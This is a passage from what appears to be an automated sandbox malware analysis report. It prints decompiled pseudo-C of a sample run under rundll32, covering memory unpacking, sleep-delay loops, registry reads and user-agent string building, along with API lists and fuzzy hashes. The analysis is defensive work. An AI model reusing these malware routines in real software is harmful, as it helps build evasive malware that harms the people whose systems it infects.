                                          					if(_t8 == 0) {
                                          						break;
                                          					}
                                          					_t23 = _t23 + 1;
                                          					_push(0x20);
                                          					_push( &(_t8[1]));
                                          				}
                                          				_t12 = E040858BE(_t23 << 2);
                                          				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                          				if(_t12 != 0) {
                                          					StrTrimA(_t21, 0x408c28c); // executed
                                          					_t26 = 0;
                                          					do {
                                          						_t24 = StrChrA(_t21, 0x20);
                                          						if(_t24 != 0) {
                                          							 *_t24 = 0;
                                          							_t24 =  &(_t24[1]);
                                          							StrTrimA(_t24, 0x408c28c);
                                          						}
                                          						_t2 = _t27 + 0x10; // 0x4d283a53
                                          						 *( *_t2 + _t26 * 4) = _t21;
                                          						_t26 = _t26 + 1;
                                          						_t21 = _t24;
                                          					} while (_t24 != 0);
                                          					_t6 = _t27 + 0x10; // 0x4d283a53
                                          					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *_t6;
                                          				}
                                          				return 0;
                                          			}











                                          APIs
                                          • StrChrA.SHLWAPI(?,00000020,00000000,04C895AC,?,?,?,04084C85,04C895AC,?,?,?,04084A8B,?,?,?), ref: 04087C8F
                                          • StrTrimA.KERNELBASE(?,0408C28C,00000002,?,?,?,04084C85,04C895AC,?,?,?,04084A8B,?,?,?,4D283A53), ref: 04087CAE
                                          • StrChrA.SHLWAPI(?,00000020,?,?,?,04084C85,04C895AC,?,?,?,04084A8B,?,?,?,4D283A53,?), ref: 04087CB9
                                          • StrTrimA.SHLWAPI(00000001,0408C28C,?,?,?,04084C85,04C895AC,?,?,?,04084A8B,?,?,?,4D283A53,?), ref: 04087CCB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Trim
                                          • String ID: S:(M
                                          • API String ID: 3043112668-2217774225
                                          • Opcode ID: 133eaf7901441bfaf7e243d9b7e91f993243a72a63c979309708c7b9b7b0d3fb
                                          • Instruction ID: 512c00122276637d2faf8686f55b234430ce13e074a4e6ebcfb291863163ad3a
                                          • Opcode Fuzzy Hash: 133eaf7901441bfaf7e243d9b7e91f993243a72a63c979309708c7b9b7b0d3fb
                                          • Instruction Fuzzy Hash: 5301B5726053156BD221AE658E48F3BBFD8EF95A60F21062CF8C1E7280DB64EC0186F1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 57%
                                          			E04084908(signed int __edx) {
                                          				signed int _v8;
                                          				long _v12;
                                          				CHAR* _v16;
                                          				long _v20;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t21;
                                          				CHAR* _t22;
                                          				CHAR* _t25;
                                          				intOrPtr _t26;
                                          				void* _t27;
                                          				void* _t31;
                                          				void* _t32;
                                          				CHAR* _t36;
                                          				CHAR* _t42;
                                          				CHAR* _t43;
                                          				CHAR* _t44;
                                          				CHAR* _t46;
                                          				void* _t49;
                                          				void* _t51;
                                          				signed char _t56;
                                          				intOrPtr _t58;
                                          				signed int _t59;
                                          				void* _t63;
                                          				CHAR* _t67;
                                          				CHAR* _t68;
                                          				char* _t69;
                                          				void* _t70;
                                          
                                          				_t61 = __edx;
                                          				_v20 = 0;
                                          				_v8 = 0;
                                          				_v12 = 0;
                                          				_t21 = E040811AF();
                                          				if(_t21 != 0) {
                                          					_t59 =  *0x408d25c; // 0x4000000a
                                          					_t55 = (_t59 & 0xf0000000) + _t21;
                                          					 *0x408d25c = (_t59 & 0xf0000000) + _t21;
                                          				}
                                          				_t22 =  *0x408d164(0, 2); // executed
                                          				_v16 = _t22;
                                          				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                          					_t25 = E04081111( &_v8,  &_v20); // executed
                                          					_t54 = _t25;
                                          					_t26 =  *0x408d2a4; // 0xbfa5a8
                                          					if( *0x408d25c > 5) {
                                          						_t8 = _t26 + 0x408e5cd; // 0x4d283a53
                                          						_t27 = _t8;
                                          					} else {
                                          						_t7 = _t26 + 0x408ea05; // 0x44283a44
                                          						_t27 = _t7;
                                          					}
                                          					E04081EC4(_t27, _t27);
                                          					_t31 = E04081A4E(_t61,  &_v20,  &_v12); // executed
                                          					if(_t31 == 0) {
                                          						CloseHandle(_v20);
                                          					}
                                          					_t63 = 5;
                                          					if(_t54 != _t63) {
                                          						 *0x408d270 =  *0x408d270 ^ 0x81bbe65d;
                                          						_t32 = E040858BE(0x60);
                                          						 *0x408d324 = _t32;
                                          						__eflags = _t32;
                                          						if(_t32 == 0) {
                                          							_push(8);
                                          							_pop(0);
                                          						} else {
                                          							memset(_t32, 0, 0x60);
                                          							_t49 =  *0x408d324; // 0x4c895b0
                                          							_t70 = _t70 + 0xc;
                                          							__imp__(_t49 + 0x40);
                                          							_t51 =  *0x408d324; // 0x4c895b0
                                          							 *_t51 = 0x408e845;
                                          						}
                                          						_t54 = 0;
                                          						__eflags = 0;
                                          						if(0 == 0) {
                                          							_t36 = RtlAllocateHeap( *0x408d238, 0, 0x43);
                                          							 *0x408d2c4 = _t36;
                                          							__eflags = _t36;
                                          							if(_t36 == 0) {
                                          								_push(8);
                                          								_pop(0);
                                          							} else {
                                          								_t56 =  *0x408d25c; // 0x4000000a
                                          								_t61 = _t56 & 0x000000ff;
                                          								_t58 =  *0x408d2a4; // 0xbfa5a8
                                          								_t13 = _t58 + 0x408e55a; // 0x697a6f4d
                                          								_t55 = _t13;
                                          								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x408c28f);
                                          							}
                                          							_t54 = 0;
                                          							__eflags = 0;
                                          							if(0 == 0) {
                                          								asm("sbb eax, eax");
                                          								E040893D5( ~_v8 &  *0x408d270, 0x408d00c); // executed
                                          								_t42 = E040898F7(0, _t55, _t63, 0x408d00c); // executed
                                          								_t54 = _t42;
                                          								__eflags = _t54;
                                          								if(_t54 != 0) {
                                          									goto L30;
                                          								}
                                          								_t43 = E0408205B(_t55); // executed
                                          								__eflags = _t43;
                                          								if(_t43 != 0) {
                                          									__eflags = _v8;
                                          									_t67 = _v12;
                                          									if(_v8 != 0) {
                                          										L29:
                                          										_t44 = E04089B6F(_t61, _t67, _v8); // executed
                                          										_t54 = _t44;
                                          										goto L30;
                                          									}
                                          									__eflags = _t67;
                                          									if(__eflags == 0) {
                                          										goto L30;
                                          									}
                                          									_t46 = E04086CD3(__eflags,  &(_t67[4])); // executed
                                          									_t54 = _t46;
                                          									__eflags = _t54;
                                          									if(_t54 == 0) {
                                          										goto L30;
                                          									}
                                          									goto L29;
                                          								}
                                          								_t54 = 8;
                                          							}
                                          						}
                                          					} else {
                                          						_t68 = _v12;
                                          						if(_t68 == 0) {
                                          							L30:
                                          							if(_v16 == 0 || _v16 == 1) {
                                          								 *0x408d160();
                                          							}
                                          							goto L34;
                                          						}
                                          						_t69 =  &(_t68[4]);
                                          						do {
                                          						} while (E04087827(_t63, _t69, 0, 1) == 0x4c7);
                                          					}
                                          					goto L30;
                                          				} else {
                                          					_t54 = _t22;
                                          					L34:
                                          					return _t54;
                                          				}
                                          			}

































                                          APIs
                                            • Part of subcall function 040811AF: GetModuleHandleA.KERNEL32(4C44544E,00000000,04084920,00000001), ref: 040811BE
                                          • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 0408499D
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • memset.NTDLL ref: 040849ED
                                          • RtlInitializeCriticalSection.NTDLL(04C89570), ref: 040849FE
                                            • Part of subcall function 04086CD3: memset.NTDLL ref: 04086CED
                                            • Part of subcall function 04086CD3: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04086D24
                                            • Part of subcall function 04086CD3: StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04084AB5), ref: 04086D2F
                                          • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04084A29
                                          • wsprintfA.USER32 ref: 04084A59
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                          • String ID:
                                          • API String ID: 4246211962-0
                                          • Opcode ID: 965ba60bb1bc1ca55947a206b221e8ee956f8d055dd2a1358dd811ba3607b648
                                          • Instruction ID: 670bd6185ad9d15aa9677c73929caa49388bfcfb1590b113a55cb31cdcf2cb5a
                                          • Opcode Fuzzy Hash: 965ba60bb1bc1ca55947a206b221e8ee956f8d055dd2a1358dd811ba3607b648
                                          • Instruction Fuzzy Hash: 9E516D71A00216ABEBA1FFA4DB84BAE77E8EF04714F14452DE5C1FA180F67CA9008B55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 90%
                                          			E04086CD3(void* __eflags, WCHAR* _a4) {
                                          				char _v40;
                                          				char _v44;
                                          				void _v48;
                                          				int _v52;
                                          				char _v56;
                                          				char _v60;
                                          				void* _v64;
                                          				char _v68;
                                          				intOrPtr _v72;
                                          				int _v76;
                                          				WCHAR* _v84;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				char _v96;
                                          				void* __ebx;
                                          				void* __esi;
                                          				intOrPtr _t40;
                                          				int _t45;
                                          				char _t50;
                                          				intOrPtr _t52;
                                          				void* _t55;
                                          				intOrPtr _t67;
                                          				void* _t70;
                                          				void* _t81;
                                          				WCHAR* _t90;
                                          
                                          				_v52 = 0;
                                          				memset( &_v48, 0, 0x2c);
                                          				_v76 = 0;
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t40 =  *0x408d2a4; // 0xbfa5a8
                                          				_t5 = _t40 + 0x408ee24; // 0x410025
                                          				_t90 = E04084814(_t5);
                                          				_v84 = _t90;
                                          				if(_t90 == 0) {
                                          					_t81 = 8;
                                          					L24:
                                          					return _t81;
                                          				}
                                          				_t45 = StrCmpNIW(_t90, _a4, lstrlenW(_t90)); // executed
                                          				if(_t45 != 0) {
                                          					_t81 = 1;
                                          					L22:
                                          					E0408147E(_v88);
                                          					goto L24;
                                          				}
                                          				if(E04089138(0,  &_v96) != 0) {
                                          					_v96 = 0;
                                          				}
                                          				_t50 = E0408A5E9(0,  *0x408d33c);
                                          				_v96 = _t50;
                                          				if(_t50 == 0) {
                                          					_t81 = 8;
                                          					goto L19;
                                          				} else {
                                          					_t52 =  *0x408d2a4; // 0xbfa5a8
                                          					_t11 = _t52 + 0x408e81a; // 0x65696c43
                                          					_t55 = E0408A5E9(0, _t11);
                                          					_t93 = _t55;
                                          					if(_t55 == 0) {
                                          						_t81 = 8;
                                          					} else {
                                          						_t81 = E040874B9(_v96, 0x80000001, _v92, _t93,  &_v60,  &_v56);
                                          						E0408147E(_t93);
                                          					}
                                          					if(_t81 != 0) {
                                          						L17:
                                          						E0408147E(_v92);
                                          						L19:
                                          						_t92 = _v96;
                                          						if(_v96 != 0) {
                                          							E0408568A(_t92);
                                          						}
                                          						goto L22;
                                          					} else {
                                          						if(( *0x408d260 & 0x00000001) == 0) {
                                          							L14:
                                          							E04086E92(_t81, _v60, _v56,  *0x408d270, 0);
                                          							_t81 = E04086737(_v72,  &_v64,  &_v60, 0);
                                          							if(_t81 == 0) {
                                          								_v68 = _v96;
                                          								_v64 =  &_v60;
                                          								_t81 = E040872F2( &_v84, 0);
                                          							}
                                          							E0408147E(_v60);
                                          							goto L17;
                                          						}
                                          						_t67 =  *0x408d2a4; // 0xbfa5a8
                                          						_t18 = _t67 + 0x408e823; // 0x65696c43
                                          						_t70 = E0408A5E9(0, _t18);
                                          						_t95 = _t70;
                                          						if(_t70 == 0) {
                                          							_t81 = 8;
                                          						} else {
                                          							_t22 =  &_v96; // 0x65696c43
                                          							_t81 = E040874B9( *_t22, 0x80000001, _v92, _t95,  &_v44,  &_v40);
                                          							E0408147E(_t95);
                                          						}
                                          						if(_t81 != 0) {
                                          							goto L17;
                                          						} else {
                                          							goto L14;
                                          						}
                                          					}
                                          				}
                                          			}





























                                          APIs
                                          • memset.NTDLL ref: 04086CED
                                            • Part of subcall function 04084814: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,04086D15,00410025,00000005,?,00000000), ref: 04084825
                                            • Part of subcall function 04084814: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 04084842
                                          • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04086D24
                                          • StrCmpNIW.SHLWAPI(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,04084AB5), ref: 04086D2F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: EnvironmentExpandStrings$lstrlenmemset
                                          • String ID: Clie
                                          • API String ID: 3817122888-1624203186
                                          • Opcode ID: c767f2b32db04c4295eecd45b869bc9f40cef0020003e4b86e3e8c9e30622d62
                                          • Instruction ID: d5c625e4d6cba5b4689bb922c348c9368d3aca1c1cb28cdf6508eb287d290e66
                                          • Opcode Fuzzy Hash: c767f2b32db04c4295eecd45b869bc9f40cef0020003e4b86e3e8c9e30622d62
                                          • Instruction Fuzzy Hash: CA416C72604315AFE750BEA0DA84DAFB6ECEF44618F014A3EB9C4F7150D676E9048B92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SysAllocString.OLEAUT32(80000002), ref: 04085057
                                          • SysAllocString.OLEAUT32(0408A6F4), ref: 0408509B
                                          • SysFreeString.OLEAUT32(00000000), ref: 040850AF
                                          • SysFreeString.OLEAUT32(00000000), ref: 040850BD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: b943b7d3cf062fff21b351b0a8270451b2d7c90b2ea24e2be4b0b86b1748e936
                                          • Instruction ID: 9648f89d384b3c3bd98c08f5b8d5bed2336c67b16befe589a29285a67ab82d3d
                                          • Opcode Fuzzy Hash: b943b7d3cf062fff21b351b0a8270451b2d7c90b2ea24e2be4b0b86b1748e936
                                          • Instruction Fuzzy Hash: F2311D71910209FFDB04EF98D9848EE7BB9FF48340B10852EF945AB250E735A941CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 83%
                                          			E00511B6F(void* __edi, intOrPtr _a4) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				unsigned int _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				void* _v28;
                                          				intOrPtr _v32;
                                          				intOrPtr* _v36;
                                          				void* _v40;
                                          				signed int _v48;
                                          				signed int _v52;
                                          				intOrPtr _t42;
                                          				void* _t49;
                                          				intOrPtr _t50;
                                          				intOrPtr _t53;
                                          				signed int _t61;
                                          				intOrPtr _t78;
                                          				void* _t79;
                                          
                                          				_t78 =  *0x514130;
                                          				_t42 = E00511C8A(_t78,  &_v24,  &_v16);
                                          				_v20 = _t42;
                                          				if(_t42 == 0) {
                                          					asm("sbb ebx, ebx");
                                          					_t61 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
                                          					_t79 = _t78 + _v24;
                                          					_v40 = _t79;
                                          					_t49 = VirtualAlloc(0, _t61 << 0xc, 0x3000, 4); // executed
                                          					_v28 = _t49;
                                          					if(_t49 == 0) {
                                          						_v20 = 8;
                                          					} else {
                                          						_v8 = _v8 & 0x00000000;
                                          						if(_t61 <= 0) {
                                          							_t50 =  *0x514140;
                                          						} else {
                                          							_t53 = _t49 - _t79;
                                          							_v32 = _t53;
                                          							_v36 = _t53 + _a4 + 0x5151a2;
                                          							_v12 = _t79;
                                          							while(1) {
                                          								asm("movsd");
                                          								asm("movsd");
                                          								asm("movsd");
                                          								asm("rol edx, cl");
                                          								E00511908(_v12 + _t53, _v12, (_v52 ^ _v48) + _v24 + _a4);
                                          								_t50 =  *_v36 +  *((intOrPtr*)(_v36 + 4));
                                          								_v8 = _v8 + 1;
                                          								_v12 = _v12 + 0x1000;
                                          								 *0x514140 = _t50;
                                          								if(_v8 >= _t61) {
                                          									break;
                                          								}
                                          								_t53 = _v32;
                                          							}
                                          						}
                                          						if(_t50 != 0x59935a40) {
                                          							_v20 = 0xc;
                                          						} else {
                                          							memcpy(_v40, _v28, _v16);
                                          						}
                                          						VirtualFree(_v28, 0, 0x8000); // executed
                                          					}
                                          				}
                                          				return _v20;
                                          			}






















                                          APIs
                                          • VirtualAlloc.KERNELBASE(00000000,-00000008,00003000,00000004,00000000,?,-00000008,-00000008), ref: 00511BC5
                                          • memcpy.NTDLL(?,?,-00000008,?,?,?,?,?,?,?,?,005111FF,-00000008), ref: 00511C57
                                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00511C72
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.519984285.0000000000510000.00000040.00020000.sdmp, Offset: 00510000, based on PE: true
                                          • Associated: 00000003.00000002.520021695.0000000000515000.00000040.00020000.sdmp
                                          • Associated: 00000003.00000002.520067609.0000000000517000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_510000_rundll32.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocFreememcpy
                                          • String ID: Dec 1 2020
                                          • API String ID: 4010158826-3539646581
                                          • Opcode ID: 7129d11a78c38e1452a2de3fe83317c7060fe88794d89786f6bb56db393b701b
                                          • Instruction ID: 56461d3266ce0a35915410e31b55bee56868a466ade99ab1556a601bafdd5ae4
                                          • Opcode Fuzzy Hash: 7129d11a78c38e1452a2de3fe83317c7060fe88794d89786f6bb56db393b701b
                                          • Instruction Fuzzy Hash: 4C316D71D4061AEBEB01DF98D885BEEBBB5BF58304F108165EA01BB240D770AE45DB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E04081295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                          				intOrPtr _v8;
                                          				void* _v12;
                                          				void* _v16;
                                          				intOrPtr _t26;
                                          				intOrPtr* _t28;
                                          				intOrPtr _t31;
                                          				intOrPtr* _t32;
                                          				void* _t39;
                                          				int _t46;
                                          				intOrPtr* _t47;
                                          				int _t48;
                                          
                                          				_t47 = __eax;
                                          				_push( &_v12);
                                          				_push(__eax);
                                          				_t39 = 0;
                                          				_t46 = 0; // executed
                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                          				_v8 = _t26;
                                          				if(_t26 < 0) {
                                          					L13:
                                          					return _v8;
                                          				}
                                          				if(_v12 == 0) {
                                          					Sleep(0xc8);
                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                          				}
                                          				if(_v8 >= _t39) {
                                          					_t28 = _v12;
                                          					if(_t28 != 0) {
                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                          						_v8 = _t31;
                                          						if(_t31 >= 0) {
                                          							_t46 = lstrlenW(_v16);
                                          							if(_t46 != 0) {
                                          								_t46 = _t46 + 1;
                                          								_t48 = _t46 + _t46;
                                          								_t39 = E040858BE(_t48);
                                          								if(_t39 == 0) {
                                          									_v8 = 0x8007000e;
                                          								} else {
                                          									memcpy(_t39, _v16, _t48);
                                          								}
                                          								__imp__#6(_v16);
                                          							}
                                          						}
                                          						_t32 = _v12;
                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                          					}
                                          					 *_a4 = _t39;
                                          					 *_a8 = _t46 + _t46;
                                          				}
                                          				goto L13;
                                          			}















                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeSleepStringlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1198164300-0
                                          • Opcode ID: a72d89e7bfcfa03d4250a7094b37400d50f57667f57e8547fae7a72a8f4a2a11
                                          • Instruction ID: 3e396766a4c065a1603aec1f3685b357c1dd2dadf5657b9ace3212bbfa819bad
                                          • Opcode Fuzzy Hash: a72d89e7bfcfa03d4250a7094b37400d50f57667f57e8547fae7a72a8f4a2a11
                                          • Instruction Fuzzy Hash: AF212F75901209EFDB11EFA4DA849DEBBF8FF48345B10416DE981BB200E734EA41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E040890A1(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                          				void* _t5;
                                          				void* _t7;
                                          				void* _t10;
                                          				void* _t13;
                                          				void* _t14;
                                          				void* _t15;
                                          				signed int _t16;
                                          				signed int _t22;
                                          
                                          				_t16 = __edx;
                                          				_t5 = HeapCreate(0, 0x400000, 0); // executed
                                          				 *0x408d238 = _t5;
                                          				if(_t5 == 0) {
                                          					_t14 = 8;
                                          					return _t14;
                                          				}
                                          				 *0x408d1a8 = GetTickCount();
                                          				_t7 = E04086A7F(_a4);
                                          				if(_t7 == 0) {
                                          					do {
                                          						_t22 = SwitchToThread() + 8;
                                          						_t10 = E04081C04(_a4, _t22);
                                          						Sleep(0x20 + _t22 * 4); // executed
                                          					} while (_t10 == 1);
                                          					if(E04089511(_t15) != 0) {
                                          						 *0x408d260 = 1; // executed
                                          					}
                                          					_t13 = E04084908(_t16); // executed
                                          					return _t13;
                                          				}
                                          				return _t7;
                                          			}












                                          APIs
                                          • HeapCreate.KERNEL32(00000000,00400000,00000000,04086F11,?), ref: 040890AA
                                          • GetTickCount.KERNEL32 ref: 040890BE
                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 040890D8
                                          • Sleep.KERNEL32(00000000,-00000008,?,00000001,?), ref: 040890F7
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                          • String ID:
                                          • API String ID: 377297877-0
                                          • Opcode ID: 6872b9a9d6ee88789ad591a18710c19e45b07b9c1fb80960f7fd8a6d3367c03c
                                          • Instruction ID: 71afd3d466df16756642b9b0955f72158eafbd387f422a17ac73ee992df804cc
                                          • Opcode Fuzzy Hash: 6872b9a9d6ee88789ad591a18710c19e45b07b9c1fb80960f7fd8a6d3367c03c
                                          • Instruction Fuzzy Hash: BCF0A471604200AAFB117F74AF0CBAA36E4AF54359F10003DE9C4F6240E73CE8008A61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E040868CF() {
                                          				void* _v8;
                                          				int _v12;
                                          				WCHAR* _v16;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* _t23;
                                          				intOrPtr _t24;
                                          				void* _t26;
                                          				intOrPtr _t32;
                                          				intOrPtr _t35;
                                          				intOrPtr _t38;
                                          				intOrPtr _t42;
                                          				void* _t45;
                                          				void* _t51;
                                          
                                          				_v12 = 0;
                                          				_t23 = E04089138(0,  &_v8); // executed
                                          				if(_t23 != 0) {
                                          					_v8 = 0;
                                          				}
                                          				_t24 =  *0x408d2a4; // 0xbfa5a8
                                          				_t4 = _t24 + 0x408ede0; // 0x4c89388
                                          				_t5 = _t24 + 0x408ed88; // 0x4f0053
                                          				_t26 = E04081B13( &_v16, _v8, _t5, _t4); // executed
                                          				_t45 = _t26;
                                          				if(_t45 == 0) {
                                          					StrToIntExW(_v16, 0,  &_v12);
                                          					_t45 = 8;
                                          					if(_v12 < _t45) {
                                          						_t45 = 1;
                                          						__eflags = 1;
                                          					} else {
                                          						_t32 =  *0x408d2a4; // 0xbfa5a8
                                          						_t11 = _t32 + 0x408edd4; // 0x4c8937c
                                          						_t48 = _t11;
                                          						_t12 = _t32 + 0x408ed88; // 0x4f0053
                                          						_t51 = E04085FCB(_t11, _t12, _t11);
                                          						_t58 = _t51;
                                          						if(_t51 != 0) {
                                          							_t35 =  *0x408d2a4; // 0xbfa5a8
                                          							_t13 = _t35 + 0x408ea59; // 0x30314549
                                          							if(E040875E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
                                          								_t60 =  *0x408d25c - 6;
                                          								if( *0x408d25c <= 6) {
                                          									_t42 =  *0x408d2a4; // 0xbfa5a8
                                          									_t15 = _t42 + 0x408ec3a; // 0x52384549
                                          									E040875E7(_t48, _t60, _v8, _t51, _t15, 0x13);
                                          								}
                                          							}
                                          							_t38 =  *0x408d2a4; // 0xbfa5a8
                                          							_t17 = _t38 + 0x408ee18; // 0x4c893c0
                                          							_t18 = _t38 + 0x408edf0; // 0x680043
                                          							_t45 = E04081BC1(_v8, 0x80000001, _t51, _t18, _t17);
                                          							HeapFree( *0x408d238, 0, _t51);
                                          						}
                                          					}
                                          					HeapFree( *0x408d238, 0, _v16);
                                          				}
                                          				_t53 = _v8;
                                          				if(_v8 != 0) {
                                          					E0408568A(_t53);
                                          				}
                                          				return _t45;
                                          			}

                                          APIs
                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04C89388,00000000,?,7519F710,00000000,7519F730), ref: 0408691E
                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04C893C0,?,00000000,30314549,00000014,004F0053,04C8937C), ref: 040869BB
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04089C10), ref: 040869CD
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 32fece1bc7419b2084c65f5cf733fbfd2a56264344e260a38a441f0731539616
                                          • Instruction ID: 7ff743eaa0cfcf418074890f0176b0bfb6e6842f1a7752a5a607179b1c20e672
                                          • Opcode Fuzzy Hash: 32fece1bc7419b2084c65f5cf733fbfd2a56264344e260a38a441f0731539616
                                          • Instruction Fuzzy Hash: 85317A32A00118FFEB10BB90DE84EEA7BBDEF44704F15457DB584BB190D675EA099B90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 59%
                                          			E04089F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                          				void* _v8;
                                          				void* __edi;
                                          				intOrPtr _t19;
                                          				void* _t25;
